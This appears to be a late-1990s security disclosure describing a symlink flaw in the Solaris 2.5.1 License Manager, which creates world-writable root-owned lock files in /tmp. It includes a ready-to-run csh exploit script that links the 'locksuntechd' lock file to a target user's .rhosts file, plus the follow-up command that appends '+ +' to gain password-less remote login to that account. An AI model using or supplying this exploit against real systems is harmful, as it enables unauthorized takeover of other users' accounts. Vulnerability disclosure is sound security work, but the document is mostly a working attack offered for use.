On Solaris 2.5.1 (maybe other versions also) the License Manager creates lock files which are owned by the root and moded 666 (-rw-rw-rw-, world writeable). Making it possible for anyone to create these root owned files anywhere on the system, and then modify them.
By replacing a lock file which Solaris's License Manager users with a symbolic link, a malicious user can replace any file on the system (it seems that it does not overwrite existing files, but rather create only new ones). The lock file is usually created in the temporary directories (/var/tmp, /tmp, or anything else the administrator choose) and by simply creating a symbolic link of the file (the file is called 'locksuntechd') to some user's '.rhosts' file, a malicious user can remotely login into that user's account without a password.
The License Manager seems to create these files almost instantly after they are removed, making it a "quick" root owned file creator.
A simple usable script follows:
#!/bin/csh -f
# Change target user name before running
# Iconoclast@thepentagon.com 10/98
rm /tmp/locksuntechd
ln -s ~targetuser/.rhosts /tmp/locksuntechd
exit
Then you just have to wait a min and `cat + + >> ~targetuser/.rhosts' to gain access to that user's account.
